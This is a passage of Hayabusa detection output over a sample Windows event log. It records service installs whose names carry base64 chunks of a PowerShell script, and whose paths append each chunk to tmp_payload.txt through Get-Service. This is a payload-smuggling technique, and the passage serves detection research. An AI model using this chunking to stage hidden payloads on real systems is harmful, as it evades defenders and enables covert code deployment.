UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append 
